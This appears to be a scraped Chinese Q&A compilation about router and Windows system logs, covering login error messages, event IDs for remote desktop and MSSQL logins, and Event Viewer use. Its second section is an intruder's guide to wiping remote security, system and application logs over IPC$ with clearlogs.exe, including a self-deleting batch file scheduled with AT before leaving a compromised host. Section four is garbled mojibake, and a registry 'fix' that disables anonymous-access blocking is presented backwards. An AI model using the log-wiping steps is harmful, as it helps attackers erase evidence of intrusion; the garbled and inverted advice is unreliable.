1. h3c 路由器系统日志有login error from of wrong user or password,是什么意思
login error from of wrong user or password
翻译为:用户或密码登录错误
有人尝试通过web或telnet 或console登录交换机但未验证成功
2. 关于什么是“系统日志”
系统日志 通过手工很难清除. 这里介绍一个工具 clearlog.exe
使用方法:
Usage: clearlogs [\\computername] <-app / -sec / -sys>
-app = 应用程序日志
-sec = 安全日志
-sys = 系统日志
a. 可以清除远程计算机的日志
** 先用ipc连接上去: net use \\ip\ipc$ 密码/user:用户名
** 然后开始清除: 方法
clearlogs \\ip -app 这个是清除远程计算机的应用程序日志
clearlogs \\ip -sec 这个是清除远程计算机的安全日志
clearlogs \\ip -sys 这个是清除远程计算机的系统日志
b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面
然后清除. 方法:
clearlogs -app 这个是清除远程计算机的应用程序日志
clearlogs -sec 这个是清除远程计算机的安全日志
clearlogs -sys 这个是清除远程计算机的系统罩?
安全日志已经被清除.Success: The log has been cleared 成功.
为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了.
例如建立一个 c.bat
rem ============================== 开始
@echo off
clearlogs -app
clearlogs -sec
clearlogs -sys
del clearlogs.exe
del c.bat
exit
rem ============================== 结束
在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果
第一行表示: 运行时不显示窗口
第二行表示: 清除应用程序日志
第三行表示: 清除安全日志
第四行表示: 清除系统日志
第五行表示: 删除 clearlogs.exe 这个工具
第六行表示: 删除 c.bat 这个批处理文件
第七行表示: 退出
用AT命令. 建立一个计划任务. 这个命令在原来的教程里面和杂志里面都有. 你可以去看看详细的使用方法
AT 时间 c:\c.bat
之后你就可以安全离开了. 这样才更安全一点.
3. 系统日志事件代码分别代表啥意思
作为一个服务器维护者,我的工作就是检查日志。今天我想和大家分享的不是上面的任何一个日志,而是系统的管理日志。在windows 2003系统中,在“开始”菜单“运行”中输入“eventvwr”就可以打开事件查看器,不过一般我们是打开计算机管理,他包含了这个时间查看器,方便管理,在运行中输入“compmgmt.msc”或者右击我的电脑选择“管理”就可以打开计算机管理。事件查看器 一般可以查看四类日志,他们分别是“应用程序”,“internet explorer”,“安全性”和“系统”。
如图
[attachment=1584]
对于“登陆/注销”来说我们重点关注 “应用程序”和“系统”这2类,“登陆/注销”这种行为一般发生在系统用户和数据库用户,下面以一个例子来具体说明。
比如,我以administrator身份登陆3389端口的远程终端,那么日志记录一般为4条,同时发生。
这个审核是默认开启的,如果想修改可以在运行中输入gpedit.msc打开组策略,在计算机配置-windows设置-安全设置-本地策略-审核策略,即可看到对系统登陆时间的审核。
[attachment=1585]
此类日志保存在“安全性”这一类中
复制代码
事件类型: 审核成功
事件来源: Security
事件种类: 帐户登录
事件 ID: 680
日期: 2010-2-4
事件: 20:52:37
用户: TAGggg-DDD3333\administrator
计算机: TAGggg-DDD3333
描述:
尝试登录的用户: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
登录帐户: administrator
源工作站: TAGggg-DDD3333
错误代码: 0x0
这个日志是记录尝试登陆的用户,比如你在登陆窗口测试用户名和密码的话,这里都会记载下载,如果你发现有不是系统用户的记录,那么肯定是有人在猜你的用户名了
复制代码
事件类型: 审核成功
事件来源: Security
事件种类: 登录/注销
事件 ID: 552
日期: 2010-2-4
事件: 20:52:37
用户: NT AUTHORITY\SYSTEM
计算机: TAGggg-DDD3333
描述:
使用明确凭据的登录尝试:
登录的用户:
用户名: TAGggg-DDD3333$
域: WORKGROUP
登录 ID: (0x0,0x3E7)
登录 GUID: -
凭据被使用的用户:
目标用户名: administrator
目标域: TAGggg-DDD3333
目标登录 GUID: -
目标服务器名称: localhost
目标服务器信息: localhost
调用方进程 ID: 3224
源网络地址: 142.97.167.96
源端口: 53637
如果登陆成功,那么将在这里记载,如果被人拿到了3389的账号和密码,那么这里将记载ip和方式,很明显这里是使用凭据登陆的。
复制代码
事件类型: 审核成功
事件来源: Security
事件种类: 登录/注销
事件 ID: 528
日期: 2010-2-4
事件: 20:52:37
用户: TAGggg-DDD3333\administrator
计算机: TAGggg-DDD3333
描述:
登录成功:
用户名: administrator
域: TAGggg-DDD3333
登录 ID: (0x0,0x3B5BA)
登录类型: 10
登录进程: User32
身份验证数据包: Negotiate
工作站名: TAGggg-DDD3333
登录 GUID: -
调用方用户名: TAGggg-DDD3333$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
调用方进程 ID: 3224
传递服务: -
源网络地址: 142.97.167.96
源端口: 53637
这条日志最为重要,他有3个地方说明了登陆方式是远程连接登陆桌面的,第一个地方是登录方式为10,这种方式是远程交互(RemoteInteractive),说明是通过终端服务、远程桌面或远程协助登陆的;第二个地方就是:登录进程: User32 ,说明是调用了user32.exe进程来登陆的。 第三个地址我们在关注一下调用方进程ID,打开任务管理器,可以看到3224的进程是winlogen.exe,这3点都说明了这个日志是远程连接日志
[attachment=1586]
复制代码
事件类型: 审核成功
事件来源: Security
事件种类: 登录/注销
事件 ID: 576
日期: 2010-2-4
事件: 20:52:37
用户: TAGggg-DDD3333\administrator
计算机: TAGggg-DDD3333
描述:
指派给新登录的特殊权限:
用户名:
域:
登录 ID: (0x0,0x3B5BA)
特权: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
这个日志是说明给予登陆用户的权限。
好了,上面就是远程登陆的日志了。下面介绍关于mssql的登陆日志。我将mssql的登陆日志分为3类:普通用户登陆,SA登陆和系统用户登陆。
需要开启sql server和windows身份验证,审核全部。点击mssql实例,右击属性,在“安全性”选项卡中选择即可
[attachment=1587]
我们重点关注SA和系统用户的登陆。
mssql的系统用户的登陆日志也保存在“安全性”这类日志中,它的日志和远程登陆相似,主要区别在第三个日志,比如
复制代码
事件类型: 审核成功
事件来源: Security
事件种类: 登录/注销
事件 ID: 528
日期: 2010-2-4
事件: 21:50:34
用户: TAGggg-DDD3333\administrator
计算机: TAGggg-DDD3333
描述:
登录成功:
用户名: administrator
域: TAGggg-DDD3333
登录 ID: (0x0,0x48EF44)
登录类型: 5
登录进程: Advapi
身份验证数据包: Negotiate
工作站名: TAGggg-DDD3333
登录 GUID: -
调用方用户名: TAGggg-DDD3333$
调用方域: WORKGROUP
调用方登录 ID: (0x0,0x3E7)
调用方进程 ID: 444
传递服务: -
源网络地址: -
源端口: -
可以看到这个日志的源网络地址和源端口为空。登录类型为5,了解过windows登陆类型的知道这是以服务的方式来登陆的,登录进程为Advapi ,是因mssql调用了LogonUser(管理员)(API call to LogonUser)”,从而产生了登录事件,调用方进程ID为444即serverices.exe的进程,在看到这个日志的最开始你可能会以为被入侵了,其实不然,当然每个情况不一样,要具体分析,因为像黑洞的远程登陆日志应当也是这样,他也是采用服务来登陆系统。我上面的这个mssql日志比较特殊,因为我是调用administrator来启动mssql的,而不是system,所以第一眼看到这个日志感觉可能中招了的想法是正确的,请仔细勘察。
MSSQL的用户登陆日志都保存在“应用程序”中,普通网站所用数据库用户的登陆,一般为
复制代码
事件类型: 信息
事件来源: MSSQLSERVER
事件种类: (4)
事件 ID: 17055
日期: 2010-2-4
事件: 21:41:06
用户: N/A
计算机: TAGggg-DDD3333
描述:
18454:
用户 'dbxxxxx' 登录成功。连接: 非信任。
在系统用登陆mssql是在这里也会有记载
复制代码
事件类型: 信息
事件来源: MSSQLSERVER
事件种类: (4)
事件 ID: 17055
日期: 2010-2-4
事件: 21:42:37
用户: TAGggg-DDD3333\administrator
计算机: TAGggg-DDD3333
描述:
18453:
用户 TAGggg-DDD3333\administrator' 登录成功。连接: 信任。
可能同时还伴随会产生这样一个日志
复制代码
描述:
8128:
使用 'xplog70.dll' 版本 '2000.80.2039' 来执行扩展存储过程 'xp_msver'。
一个返回有关服务器的实际内部版本号的信息以及服务器环境的有关信息的扩展存储
下面说SA的日志。
sa登陆成功日志:
事件类型: 信息
复制代码
事件来源: MSSQLSERVER
事件种类: (4)
事件 ID: 17055
日期: 2010-2-4
事件: 21:02:21
用户: N/A
计算机: TAGggg-DDD3333
描述:
18454:
用户 'sa' 登录成功。连接: 非信任。
如果看到这样的日志那么你的小心了,SA密码已经被人拿去了。
如果执行游览文件功能,那么会产生这样的日志
复制代码
事件类型: 信息
事件来源: MSSQLSERVER
事件种类: (2)
事件 ID: 17055
日期: 2010-2-4
事件: 21:02:45
用户: N/A
计算机: TAGggg-DDD3333
描述:
8128:
使用 'xpstar.dll' 版本 '2000.80.2039' 来执行扩展存储过程 'xp_dirtree'。
4. linux绯荤粺涓涓庣敤鎴风櫥褰曠浉鍏崇殑鏃ュ織鏂囦欢鏈
鍦↙inux绯荤粺涓锛屼笌鐢ㄦ埛鐧诲綍鐩稿叧鐨勬棩蹇楁枃浠朵富瑕佹湁浠ヤ笅鍑犱釜锛
1.`/var/log/auth.log`锛杩欎釜鏂囦欢璁板綍浜嗙郴缁熶笂鎵鏈夌殑鐢ㄦ埛鐧诲綍浜嬩欢锛屽寘鎷灏濊瘯鐧诲綍鍜屾垚鍔熺殑鐧诲綍銆傚畠鍖呭惈浜嗙敤鎴疯緭鍏ョ殑鐢ㄦ埛鍚嶃両P鍦板潃銆佺櫥褰曟椂闂寸瓑淇℃伅銆傝繖涓鏂囦欢涓昏佺敤浜庣郴缁熺$悊鍛樺垎鏋愮敤鎴风殑鐧诲綍琛屼负锛屼互妫娴嬪彲鑳界殑闈炴硶鐧诲綍鎴栨伓鎰忚屼负銆
2./var/log/secure锛氳繖涓鏂囦欢鍦ㄦ煇浜汱inux鍙戣岀増涓瀛樺湪锛屽畠鎻愪緵浜嗕笌瀹夊叏鐩稿叧鐨勭櫥褰曟棩蹇椾俊鎭锛屼緥濡傚瘑鐮佷涪澶便佽处鎴疯В閿佺瓑浜嬩欢銆備笉杩囬渶瑕佹敞鎰忕殑鏄锛岃繖涓鏂囦欢鐨勫唴瀹瑰彲鑳戒細鍥犱负涓嶅悓鐨勫彂琛岀増鍜岄厤缃鏈夋墍涓嶅悓銆
3./var/log/messages锛鍦ㄦ煇浜汱inux鍙戣岀増涓锛/var/log/messages鏂囦欢涔熺敤浜庤板綍鐢ㄦ埛鐧诲綍浜嬩欢銆備笌/var/log/auth.log绫讳技锛屽畠涔熷寘鍚浜嗙敤鎴风櫥褰曠殑鐩稿叧淇℃伅锛屽傜敤鎴峰悕銆両P鍦板潃绛夈
杩欎簺鏃ュ織鏂囦欢閫氬父鐢辩郴缁熷畧鎶よ繘绋嬶紙濡俛uthlog鎴杝ecure锛夎嚜鍔ㄨ板綍锛屽苟瀹氭湡鍐欏叆鍒扮佺洏涓銆傝繖浜涙棩蹇楁枃浠跺逛簬绯荤粺绠$悊鍛樺拰瀹夊叏涓撳舵潵璇撮潪甯搁噸瑕侊紝鍥犱负浠栦滑鍙浠ヤ粠涓鑾峰彇鏈夊叧绯荤粺瀹夊叏鎬х殑閲嶈佷俊鎭锛屼緥濡傛槸鍚﹀瓨鍦ㄦ湭缁忔巿鏉冪殑鐧诲綍灏濊瘯銆佹槸鍚﹀瓨鍦ㄥ瘑鐮佹硠闇茬瓑銆
5. WINDOWS 操作系统非法关机如何通过系统日志查看
事件查看器相当于操作系统的保健医生,查看应用程序、安全性和系统日志,查看是否存在非法登录、系统是否非正常关机、程序执行错误等信息,通过查看事件属性来判定错误产生的来源和解决方法,使操作系统和应用程序正常工作。本文介绍了事件查看器的一些相关知识,最后给出了一个安全维护实例,对安全维护人员维护系统有一定的借鉴和参考。
(一)事件查看器相关知识
1.事件查看器
事件查看器是 Microsoft Windows 操作系统工具,事件查看器相当于一本厚厚的系统日志,可以查看关于硬件、软件和系统问题的信息,也可以监视Windows 操作系统中的安全事件。有三种方式来打开事件查看器:
(1)单击“开始”-“设置”-“控制面板”-“管理工具”-“事件查看器”,开事件查看器窗口
(2)在“运行”对话框中手工键入“%SystemRoot%\system32\eventvwr.msc /s”打开事件查看器窗口。
(3)在运行中直接输入“eventvwr”或者“eventvwr.msc”直接打开事件查看器。
2.事件查看器中记录的日志类型
在事件查看器中一共记录三种类型的日志,即:
(1)应用程序日志
包含由应用程序或系统程序记录的事件,主要记录程序运行方面的事件,例如数据库程序可以在应用程序日志中记录文件错误,程序开发人员可以自行决定监视哪些事件。如果某个应用程序出现崩溃情况,那么我们可以从程序事件日志中找到相应的记录,也许会有助于你解决问题。
(2)安全性日志
记录了诸如有效和无效的登录尝试等事件,以及与资源使用相关的事件,例如创建、打开或删除文件或其他对象,系统管理员可以指定在安全性日志中记录什么事件。默认设置下,安全性日志是关闭的,管理员可以使用组策略来启动安全性日志,或者在注册表中设置审核策略,以便当安全性日志满后使系统停止响应。
(3)系统日志
包含Windows XP的系统组件记录的事件,例如在启动过程中加载驱动程序或其他系统组件失败将记录在系统日志中,默认情况下Windows会将系统事件记录到系统日志之中。 如果计算机被配置为域控制器,那么还将包括目录服务日志、文件复制服务日志;如果机子被配置为域名系统(DNS)服务器,那么还将记录DNS服务器日志。当启动Windows时,“事件日志”服务(EventLog)会自动启动,所有用户都可以查看应用程序和系统日志,但只有管理员才能访问安全性日志。
在事件查看器中主要记录五种事件,事件查看器屏幕左侧的图标描述了 Windows 操作系统对事件的分类。事件查看器显示如下类型的事件:
(1)错误:重大问题,例如数据丢失或功能损失。例如,如果服务在启动期间无法加载,便会记录一个错误。
(2)警告:不一定重要的事件也能指出潜在的问题。例如,如果磁盘空间低,便会记录一个警告。
(3) 信息:描述应用程序、驱动程序或服务是否操作成功的事件。例如,如果网络驱动程序成功加载,便会记录一个信息事件。
(4)成功审核:接受审核且取得成功的安全访问尝试。例如,用户对系统的成功登录尝试将作为一个“成功审核”事件被记录下来。
(5)失败审核:接受审核且未成功的安全访问尝试。例如,如果用户试图访问网络驱动器但未成功,该尝试将作为“失败审核”被记录下来。
(二)维护服务器安全实例
1.打开并查看事件查看器中的三类日志
在“运行”中输入“eventvwr.msc”直接打开事件查看器,在该窗口中单击“系统”,单击窗口右边的类型进行排序,可以看到类型中有警告、错误等多条信息。
2.查看系统错误记录详细信息
选择“错误”记录,双击即可打开并查看事件的属性,如图2所示,可以发现该事件为一个攻击事件,其事件描述为:
连接自 211.99.226.9 的一个匿名会话尝试在此计算机上打开一个 LSA 策略句柄。尝试被以 STATUS_ACCESS_DENIED 拒绝, 以防止将安全敏感的信息泄露给匿名呼叫者。
进行此尝试的应用程序需要被更正。请与应用程序供应商联系。 作为暂时的解决办法,此安全措施可以通过设置: \HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymousBlock DWORD 值为 1 来禁用。 此消息将一天最多记录一次。
说明:该描述信息表明IP地址为“211.99.226.9”的计算机在攻击此服务器。
3.根据提示修补系统漏洞
根据描述信息,直接打开注册表编辑器,依次层层展开找到键值“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\TurnOffAnonymous”新建一个DWORD 的 “TurnOffAnonymousBlock Block DWORD” 键,并设置其值为“ 1”,。
说明:如果在事件属性中未给出解决方案,除了在google中寻找解决方法外,还可以对错误信息进行追踪,以找到合适的解决方法,一般有两种方式:
(1)微软知识库。微软知识库的文章是由微软公司官方资料和微软MVP撰写的技术文章组成,主要解决微软产品的问题及故障。当微软每一个产品的Bug和容易出错的应用点被发现后,都将有与其对应的KB文章分析这项错误的解决方案。微软知识库的地址是:http://support.microsoft.com,在网页左边的“搜索(知识库)”中输入相关的关键字进行查询,事件发生源和ID等信息。当然,输入详细描述中的关键词也是一个好办法,如果日志中有错误编号,输入这个错误编号进行查询。
(2)通过Eventid.net网站来查询
要查询系统错误事件的解决方案,其实还有一个更好的地方,那就是Eventid.net网站地址是:http://www.eventid.net。这个网站由众多微软MVP(最有价值专家)主持,几乎包含了全部系统事件的解决方案。登录网站后,单击“Search Events(搜索事件)”链接,出现事件搜索页面。根据页面提示,输入Event ID(事件ID)和Event Source(事件源),并单击“Search”按钮。Eventid.net的系统会找到所有相关的资源及解决方案。最重要的是,享受这些解决方案是完全免费的。当然,Eventid.net的付费用户则能享受到更好的服务,比如直接访问针对某事件的知识库文章集等。
4.多方复查
既然出现了LSA的匿名枚举,那么一定会存在登录信息,如图4所示,单击“安全性”查看事件属性,先针对“审核失败”进行查看,可以看到IP地址“211.99.226.9”的多次连接失败的审核信息。需要特别注意的是,事件查看器中记录的日志必须先在安全策略中进行设置,默认情况下不记录,只要启用审核以后才记录。然后依次查看审核成功的登录记录,如果发现该IP地址登录成功,那么还需要对系统进行彻底的安全检查,包括修改登录密码,查看系统时候被攻击者留下了后门。在本例中主要事件就是IP地址为211.99.226.9的服务器在进行密码攻击扫描,根据事件属性中提供的策略进行设置后,即可解决该匿名枚举的安全隐患。
6. windows有三种类型的事件日志分别是
Windows有三种类型的事件日志分别是:应用程序日志、安全日志和系统日志。
1. 应用程序日志:
这些日志主要记录由应用程序或程序组件生成的事件。例如,如果某个应用程序崩溃或出现错误,相关信息会被记录在应用程序日志中。
通过查看这些日志,管理员或用户可以了解某个应用程序的运行状态,是否出现了错误,以及错误的详细信息。
例如,当Microsoft Office应用程序发生错误并显示错误对话框时,该错误的相关信息也可能同时被记录在应用程序日志中。
2. 安全日志:
安全日志专注于记录与系统安全相关的事件,如用户登录尝试、权限更改、文件或目录的访问等。
这些日志对于检测潜在的安全威胁或未经授权的访问尝试至关重要。例如,如果有人尝试使用错误的密码多次登录系统,这样的尝试会被记录在安全日志中。
通过分析这些日志,管理员可以识别出异常行为或潜在的安全风险,并采取相应的措施。
3. 系统日志:
系统日志记录与Windows操作系统本身相关的事件,如驱动程序的加载、系统服务的启动或停止、系统错误等。
这些日志对于诊断系统级问题或了解系统的运行状态非常有用。例如,如果Windows在启动时遇到问题,相关的错误信息可能会被记录在系统日志中。
通过查看系统日志,管理员可以对系统的稳定性和健康状况有一个全面的了解。
总之,Windows的事件日志提供了一个宝贵的资源,用于了解系统的运行状态、诊断问题以及检测潜在的安全风险。通过定期查看和分析这些日志,管理员可以采取适当的措施来确保系统的稳定和安全。